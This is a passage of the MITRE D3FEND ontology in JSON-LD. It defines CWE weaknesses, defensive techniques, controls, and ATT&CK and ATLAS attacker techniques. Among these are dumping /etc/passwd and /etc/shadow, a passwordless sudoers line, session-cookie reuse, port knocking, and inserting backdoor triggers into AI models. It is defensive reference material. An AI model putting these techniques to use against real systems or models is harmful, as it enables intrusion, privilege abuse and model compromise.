      "d3f:cwe-id": "CWE-379",
      "d3f:definition": "The product creates a temporary file in a directory whose permissions allow unintended actors to determine the file's existence or otherwise access that file.",
      "rdfs:label": "Creation of Temporary File in Directory with Insecure Permissions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-377"
      }
    },
    {
      "@id": "d3f:AML.T0043.004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0043.004",
      "d3f:definition": "The adversary may add a perceptual trigger into inference data.\nThe trigger may be imperceptible or non-obvious to humans.\nThis technique is used in conjunction with [Poison AI Model](/techniques/AML.T0018.000) and allows the adversary to produce their desired effect in the target model.",
      "rdfs:label": "Insert Backdoor Trigger - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0043.004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0043"
      },
      "skos:prefLabel": "Insert Backdoor Trigger"
    },
    {
      "@id": "d3f:ProgressivelyGrowingGAN",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-PGG",
      "d3f:definition": "Progressive Growing GAN (ProGAN) is an extension to the GAN training process that allows for the stable training of generator models that can output large high-quality images.",
      "d3f:kb-article": "## References\n\nMachine Learning Mastery. (n.d.). Introduction to Progressive Growing Generative Adversarial Networks. [Link](https://machinelearningmastery.com/introduction-to-progressive-growing-generative-adversarial-networks/)",
      "d3f:synonym": "ProGAN",
      "rdfs:label": "Progressively Growing GAN",
      "rdfs:subClassOf": {
        "@id": "d3f:ImageSynthesisGAN"
      }
    },
    {
      "@id": "d3f:CWE-575",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-575",
      "d3f:definition": "The product violates the Enterprise JavaBeans (EJB) specification by using AWT/Swing.",
      "rdfs:label": "EJB Bad Practices: Use of AWT Swing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:OTTestCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Commands a  device to run a program in Test mode.",
      "rdfs:label": "OT Test Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceOperatingModeCommandEvent"
        },
        {
          "@id": "_:Nbb3e91eb9cbc41ddbe07d976e4ce85b8"
        },
        {
          "@id": "_:N4802049755604e48a27d21c0ff1d7589"
        }
      ]
    },
    {
      "@id": "_:Nbb3e91eb9cbc41ddbe07d976e4ce85b8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControllerOperatingMode"
      }
    },
    {
      "@id": "_:N4802049755604e48a27d21c0ff1d7589",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTTestCommand"
      }
    },
    {
      "@id": "d3f:CCI-000068_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system implements cryptographic mechanisms to protect the confidentiality of remote access sessions.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:EncryptedTunnels"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-14T00:00:00"
      },
      "rdfs:label": "CCI-000068"
    },
    {
      "@id": "d3f:T1003.008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:EncryptedCredential"
        },
        {
          "@id": "d3f:PasswordFile"
        }
      ],
      "d3f:attack-id": "T1003.008",
      "d3f:definition": "Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user.(Citation: Linux Password and Shadow File Formats)",
      "rdfs:label": "/etc/passwd and /etc/shadow",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1003"
        },
        {
          "@id": "_:Nf51c522b10474a7d94a53c9167a37930"
        },
        {
          "@id": "_:N198ed6529e184bd998d07337229ca361"
        }
      ]
    },
    {
      "@id": "_:Nf51c522b10474a7d94a53c9167a37930",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:EncryptedCredential"
      }
    },
    {
      "@id": "_:N198ed6529e184bd998d07337229ca361",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PasswordFile"
      }
    },
    {
      "@id": "d3f:AML.T0016.000",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0016.000",
      "d3f:definition": "Adversaries may search for existing open source implementations of AI attacks. The research community often publishes their code for reproducibility and to further future research. Libraries intended for research purposes, such as CleverHans, the Adversarial Robustness Toolbox, and FoolBox, can be weaponized by an adversary. Adversaries may also obtain and use tools that were not originally designed for adversarial AI attacks as part of their attack.",
      "rdfs:label": "Adversarial AI Attack Implementations - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0016.000"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0016"
      },
      "skos:prefLabel": "Adversarial AI Attack Implementations"
    },
    {
      "@id": "d3f:OTReadTimeCommand",
      "@type": "owl:Class",
      "d3f:definition": "Read timing mechanisms.",
      "rdfs:comment": "example",
      "rdfs:label": "OT Read Time Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTTimeCommand"
      }
    },
    {
      "@id": "d3f:ApplicationShim",
      "@type": "owl:Class",
      "d3f:definition": "An application shim adapts an application program to run on a version of a platform for which they were not originally created. Most commonly \"Application Shimming\" refers to use of The Windows Application Compatibility Toolkit (ACT) provides backward compatibility by simulating the behavior of older version of Windows.",
      "rdfs:label": "Application Shim",
      "rdfs:seeAlso": [
        {
          "@id": "d3f:Shim"
        },
        {
          "@id": "http://dbpedia.org/resource/Shim_(computing)#Examples"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Shim"
      }
    },
    {
      "@id": "d3f:ATLASExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:AML.TA0010"
      },
      "rdfs:label": "Exfiltration Technique - ATLAS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTechnique"
        },
        {
          "@id": "_:Ne28d349f19ba4cd28d1c9f4a9057d944"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Ne28d349f19ba4cd28d1c9f4a9057d944",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AML.TA0010"
      }
    },
    {
      "@id": "d3f:Reference-GuardsForApplicationInSoftwareTamperproofing_PurdueResearchFoundation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US7287166B1/en?oq=US-7287166-B1"
      },
      "d3f:kb-abstract": "A method of protecting a software program from unauthorized modification, and a system for practicing the method. The method utilizes self-protecting software code. Armed internally with self-defensive mechanisms, a self-protecting software program is tamper-resistant. Whenever its integrity is compromised, a self-protecting software program may become unusable due to software program crashes or other errors, or may generate subtle errors that do not immediately result render the program unusable but still result in incorrect software program execution. A self-protecting software program also may be able to repair itself to restore the integrity of its damaged code. The system comprises a computer program for automatically adding self-protection features to a software program.",
      "d3f:kb-author": "Hoi Chang; Mikhail J. Atallah; John R. Rice",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Purdue Research Foundation",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessCodeSegmentVerification"
      },
      "d3f:kb-reference-title": "Guards for application in software tamperproofing",
      "rdfs:label": "Reference - Guards for application in software tamperproofing - Purdue Research Foundation"
    },
    {
      "@id": "d3f:T1553",
      "@type": "owl:Class",
      "d3f:attack-id": "T1553",
      "d3f:definition": "Adversaries may undermine security controls that will either warn users of untrusted activity or prevent execution of untrusted programs. Operating systems and security products may contain mechanisms to identify programs or websites as possessing some level of trust. Examples of such features would include a program being allowed to run because it is signed by a valid code signing certificate, a program prompting the user with a warning because it has an attribute set from being downloaded from the Internet, or getting an indication that you are about to connect to an untrusted site.",
      "rdfs:label": "Subvert Trust Controls",
      "rdfs:subClassOf": {
        "@id": "d3f:DefenseEvasionTechnique"
      }
    },
    {
      "@id": "d3f:CCI-001377_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely authenticates source domains for information transfer.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-22T00:00:00"
      },
      "rdfs:label": "CCI-001377"
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-4_11",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:control-name": "Information Flow Enforcement | Configuration of Security or Privacy Policy Filters",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-4(11)"
    },
    {
      "@id": "d3f:VirtualizationSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Virtualization software allows a single host computer to create and run one or more virtual environments. Virtualization software is most often used to emulate a complete computer system in order to allow a guest operating system to be run, for example allowing Linux to run as a guest on top of a PC that is natively running a Microsoft Windows operating system (or the inverse, running Windows as a guest on Linux).",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Category:Virtualization_software"
      },
      "rdfs:label": "Virtualization Software",
      "rdfs:subClassOf": {
        "@id": "d3f:ServiceApplication"
      }
    },
    {
      "@id": "d3f:CWE-478",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-478",
      "d3f:definition": "The code does not have a default case in an expression with multiple conditions, such as a switch statement.",
      "rdfs:label": "Missing Default Case in Multiple Condition Expression",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1023"
      }
    },
    {
      "@id": "d3f:caused-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x caused-by y: The event or action x occurs as a consequence of event or action y.",
      "owl:inverseOf": {
        "@id": "d3f:causes"
      },
      "rdfs:isDefinedBy": {
        "@id": "https://www.commoncoreontologies.org/ont00001819"
      },
      "rdfs:label": "caused-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:CWE-1385",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1385",
      "d3f:definition": "The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.",
      "d3f:synonym": "Cross-Site WebSocket hijacking (CSWSH)",
      "rdfs:label": "Missing Origin Validation in WebSockets",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-346"
      }
    },
    {
      "@id": "d3f:CWE-1084",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1084",
      "d3f:definition": "A function or method contains too many operations that utilize a data manager or file resource.",
      "rdfs:label": "Invokable Control Element with Excessive File or Data Access Operations",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-405"
      }
    },
    {
      "@id": "d3f:MemoryBoundaryTracking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:MemoryBoundaryTracking"
      ],
      "d3f:analyzes": {
        "@id": "d3f:ProcessCodeSegment"
      },
      "d3f:d3fend-id": "D3-MBT",
      "d3f:definition": "Analyzing a call stack for return addresses which point to unexpected  memory locations.",
      "d3f:kb-article": "## How it works\nThis technique monitors for indicators of whether a return address is outside memory previously allocated for an object (i.e. function, module, process, or thread). If so, code that the return address points to is treated as malicious code.\n\n## Considerations\nKernel malware can manipulate memory contents, for example modifying pointers to hide processes, and thereby impact the accuracy of memory allocation information used to perform the analysis.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-InferentialExploitAttemptDetection_CrowdstrikeInc"
      },
      "rdfs:label": "Memory Boundary Tracking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:N5f8a9f5a745b43c893f58bece71d46a2"
        }
      ]
    },
    {
      "@id": "_:N5f8a9f5a745b43c893f58bece71d46a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ProcessCodeSegment"
      }
    },
    {
      "@id": "d3f:TA0108",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "rdfs:label": "Initial Access - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Initial Access"
    },
    {
      "@id": "d3f:CCI-002536_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": {
        "@id": "d3f:RFShielding"
      },
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system protects organization-defined external and internal wireless links from organization-defined types of signal parameter attacks or references to sources for such attacks.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-07-02T00:00:00"
      },
      "rdfs:label": "CCI-002536"
    },
    {
      "@id": "d3f:DefenseEvasionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The adversary is trying to avoid being detected.",
      "d3f:enables": {
        "@id": "d3f:TA0005"
      },
      "rdfs:label": "Defense Evasion Technique",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTechnique"
        },
        {
          "@id": "d3f:OffensiveTechnique"
        },
        {
          "@id": "_:N1db04c4eb6b54988b50573a73263860a"
        }
      ]
    },
    {
      "@id": "_:N1db04c4eb6b54988b50573a73263860a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0005"
      }
    },
    {
      "@id": "d3f:CWE-791",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-791",
      "d3f:definition": "The product receives data from an upstream component, but does not completely filter special elements before sending it to a downstream component.",
      "rdfs:label": "Incomplete Filtering of Special Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-790"
      }
    },
    {
      "@id": "d3f:capec-id",
      "@type": "owl:DatatypeProperty",
      "d3f:definition": "Unique identifier for a CAPEC technique, i.e. a common attack pattern identified by the pattern CAPEC-[number].",
      "rdfs:label": "capec-id",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-kb-data-property"
      }
    },
    {
      "@id": "d3f:DS0040",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Operational databases contain information about the status of the operational process and associated devices, including any measurements, events, history, or alarms that have occurred",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Operational Database (ATT&CK DS)"
    },
    {
      "@id": "d3f:DirectionalNetworkLink",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DirectionalNetworkLink"
      ],
      "d3f:d3fend-id": "D3-DNL",
      "d3f:definition": "Enforce one-way network communication by preventing two-way communication.",
      "d3f:kb-article": "## How it works\nUsing a device such as a data diode, or otherwise enforcing unidirectional (one-way) network communication / data transfer, to physically prevent signals from traveling in the reverse direction.\n\nUnidirectional network link enforcement is a security measure used to separate control and safety systems in operational technology (OT) environments. By employing physical data diodes, this approach ensures one-way communication, allowing information from safety systems to be viewed without permitting any modification or interference, thereby protecting the integrity of the safety system.\n\n",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-SecureOneWayDataTransferUsingCommunicationInterfaceCircuitry"
      },
      "d3f:restricts": {
        "@id": "d3f:PhysicalLink"
      },
      "d3f:uses": {
        "@id": "d3f:PhysicalDataDiode"
      },
      "rdfs:label": "Directional Network Link",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkIsolation"
        },
        {
          "@id": "_:N74dc1f99b36d459192f7272fae08d32f"
        },
        {
          "@id": "_:N7d89bcb610774258bad6a11b9e161b91"
        }
      ]
    },
    {
      "@id": "_:N74dc1f99b36d459192f7272fae08d32f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalLink"
      }
    },
    {
      "@id": "_:N7d89bcb610774258bad6a11b9e161b91",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PhysicalDataDiode"
      }
    },
    {
      "@id": "d3f:T0877",
      "@type": "owl:Class",
      "d3f:attack-id": "T0877",
      "d3f:definition": "Adversaries may seek to capture process values related to the inputs and outputs of a PLC. During the scan cycle, a PLC reads the status of all inputs and stores them in an image table. (Citation: Nanjundaiah, Vaidyanath) The image table is the PLCs internal storage location where values of inputs/outputs for one scan are stored while it executes the user program. After the PLC has solved the entire logic program, it updates the output image table. The contents of this output image table are written to the corresponding output points in I/O Modules.",
      "rdfs:label": "I/O Image - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSCollectionTechnique"
      },
      "skos:prefLabel": "I/O Image"
    },
    {
      "@id": "d3f:CWE-1339",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1339",
      "d3f:definition": "The product processes a real number with an implementation in which the number's representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result.",
      "rdfs:label": "Insufficient Precision or Accuracy of a Real Number",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-682"
      }
    },
    {
      "@id": "d3f:OperatingSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Kernel"
        },
        {
          "@id": "d3f:LocalUserAccount"
        },
        {
          "@id": "d3f:OperatingSystemClock"
        },
        {
          "@id": "d3f:SystemServiceSoftware"
        }
      ],
      "d3f:definition": "An operating system (OS) is system software that manages computer hardware and software resources and provides common services for computer programs. All computer programs, excluding firmware, require an operating system to function. Time-sharing operating systems schedule tasks for efficient use of the system and may also include accounting software for cost allocation of processor time, mass storage, printing, and other resources.",
      "d3f:may-contain": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      },
      "rdfs:label": "Operating System",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Operating_system"
        },
        {
          "@id": "https://schema.ocsf.io/objects/os"
        }
      ],
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N7f014ab9097e4d86b537e28ea75ab21e"
        },
        {
          "@id": "_:N4dc05552eef04a9a9c5438dc349dd8f2"
        },
        {
          "@id": "_:Nc9685930aa1544efac2185f104fdff5d"
        },
        {
          "@id": "_:Nc1f94b48288f4ecb949a72982516219e"
        },
        {
          "@id": "_:N957287b50c2b44a585544a1496d4cfb1"
        }
      ]
    },
    {
      "@id": "_:N7f014ab9097e4d86b537e28ea75ab21e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Kernel"
      }
    },
    {
      "@id": "_:N4dc05552eef04a9a9c5438dc349dd8f2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalUserAccount"
      }
    },
    {
      "@id": "_:Nc9685930aa1544efac2185f104fdff5d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemClock"
      }
    },
    {
      "@id": "_:Nc1f94b48288f4ecb949a72982516219e",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemServiceSoftware"
      }
    },
    {
      "@id": "_:N957287b50c2b44a585544a1496d4cfb1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemConfigurationComponent"
      }
    },
    {
      "@id": "d3f:CWE-319",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-319",
      "d3f:definition": "The product transmits sensitive or security-critical data in cleartext in a communication channel that can be sniffed by unauthorized actors.",
      "rdfs:label": "Cleartext Transmission of Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-311"
      }
    },
    {
      "@id": "d3f:T1669",
      "@type": "owl:Class",
      "d3f:attack-id": "T1669",
      "d3f:definition": "Adversaries may gain initial access to target systems by connecting to wireless networks. They may accomplish this by exploiting open Wi-Fi networks used by target devices or by accessing secured Wi-Fi networks — requiring [Valid Accounts](https://attack.mitre.org/techniques/T1078) — belonging to a target organization.(Citation: DOJ GRU Charges 2018)(Citation: Nearest Neighbor Volexity) Establishing a connection to a Wi-Fi access point requires a certain level of proximity to both discover and maintain a stable network connection.",
      "rdfs:label": "Wi-Fi Networks",
      "rdfs:subClassOf": {
        "@id": "d3f:InitialAccessTechnique"
      }
    },
    {
      "@id": "d3f:powers",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x powers y: x furnishes y with the energy or force required for y's functionality or operation.",
      "rdfs:label": "powers",
      "rdfs:subPropertyOf": {
        "@id": "d3f:has-dependent"
      }
    },
    {
      "@id": "d3f:CCI-001094_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system restricts the ability of individuals to launch organization-defined denial of service attacks against other information systems.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001094"
    },
    {
      "@id": "d3f:CWE-284",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-284",
      "d3f:definition": "The product does not restrict or incorrectly restricts access to a resource from an unauthorized actor.",
      "d3f:synonym": "Authorization",
      "rdfs:label": "Improper Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:Weakness"
      }
    },
    {
      "@id": "d3f:ConnectSocket",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:connects": {
        "@id": "d3f:Pipe"
      },
      "d3f:definition": "The connect socket system call connects the socket to a target address.",
      "rdfs:label": "Connect Socket",
      "rdfs:seeAlso": {
        "@id": "https://man7.org/linux/man-pages/man2/connect.2.html"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:Nf6ebc4df3f7a4d1591587734a0ad0828"
        }
      ]
    },
    {
      "@id": "_:Nf6ebc4df3f7a4d1591587734a0ad0828",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:connects"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:T1506",
      "@type": "owl:Class",
      "d3f:attack-id": "T1506",
      "d3f:definition": "Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1550.004",
      "rdfs:label": "Web Session Cookie",
      "rdfs:seeAlso": {
        "@id": "d3f:T1550.004"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:LateralMovementTechnique"
        }
      ]
    },
    {
      "@id": "d3f:T1593.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1593.002",
      "d3f:definition": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)",
      "rdfs:label": "Search Engines",
      "rdfs:subClassOf": {
        "@id": "d3f:T1593"
      }
    },
    {
      "@id": "d3f:T1205.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1205.001",
      "d3f:definition": "Adversaries may use port knocking to hide open ports used for persistence or command and control. To enable a port, an adversary sends a series of attempted connections to a predefined sequence of closed ports. After the sequence is completed, opening a port is often accomplished by the host based firewall, but could also be implemented by custom software.",
      "d3f:produces": {
        "@id": "d3f:NetworkTraffic"
      },
      "rdfs:label": "Port Knocking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1205"
        },
        {
          "@id": "_:N8e9aebec0c7d4c18af8649d3c3ed7002"
        }
      ]
    },
    {
      "@id": "_:N8e9aebec0c7d4c18af8649d3c3ed7002",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-383",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-383",
      "d3f:definition": "Thread management in a Web application is forbidden in some circumstances and is always highly error prone.",
      "rdfs:label": "J2EE Bad Practices: Direct Use of Threads",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-695"
      }
    },
    {
      "@id": "d3f:T1496.004",
      "@type": "owl:Class",
      "d3f:attack-id": "T1496.004",
      "d3f:definition": "Adversaries may leverage compromised software-as-a-service (SaaS) applications to complete resource-intensive tasks, which may impact hosted service availability.",
      "rdfs:label": "Cloud Service Hijacking",
      "rdfs:subClassOf": {
        "@id": "d3f:T1496"
      }
    },
    {
      "@id": "d3f:CWE-1273",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1273",
      "d3f:definition": "The credentials necessary for unlocking a device are shared across multiple parties and may expose sensitive information.",
      "rdfs:label": "Device Unlock Credential Sharing",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-200"
      }
    },
    {
      "@id": "d3f:T1169",
      "@type": "owl:Class",
      "d3f:attack-id": "T1169",
      "d3f:definition": "The sudoers file, <code>/etc/sudoers</code>, describes which users can run which commands and from which terminals. This also describes which commands users can run as other users or groups. This provides the idea of least privilege such that users are running in their lowest possible permissions for most of the time and only elevate to other users or permissions as needed, typically by prompting for a password. However, the sudoers file can also specify when to not prompt users for passwords with a line like <code>user1 ALL=(ALL) NOPASSWD: ALL</code> (Citation: OSX.Dok Malware).",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.003",
      "rdfs:label": "Sudo",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.003"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:PrivilegeEscalationTechnique"
      }
    },
    {
      "@id": "d3f:ATTACKEnterpriseMitigation",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK Enterprise Mitigation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseThing"
        },
        {
          "@id": "_:Nc4901b9677ff47268e56ce9ddca8156d"
        },
        {
          "@id": "_:N0fdd0ef9f62a418798bcfc51890c36c0"
        }
      ]
    },
    {
      "@id": "_:Nc4901b9677ff47268e56ce9ddca8156d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:semantic-relation"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DefensiveTechnique"
      }
    },
    {
      "@id": "_:N0fdd0ef9f62a418798bcfc51890c36c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:d3fend-comment"
      },
      "owl:someValuesFrom": {
        "@id": "xsd:string"
      }
    },
    {
      "@id": "d3f:CWE-269",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-269",
      "d3f:definition": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor.",
      "rdfs:label": "Improper Privilege Management",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1119",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": {
        "@id": "d3f:File"
      },
      "d3f:attack-id": "T1119",
      "d3f:definition": "Once established within a system or network, an adversary may use automated techniques for collecting internal data. Methods for performing this technique could include use of a [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) to search for and copy information fitting set criteria such as file type, location, or name at specific time intervals.",
      "rdfs:label": "Automated Collection",
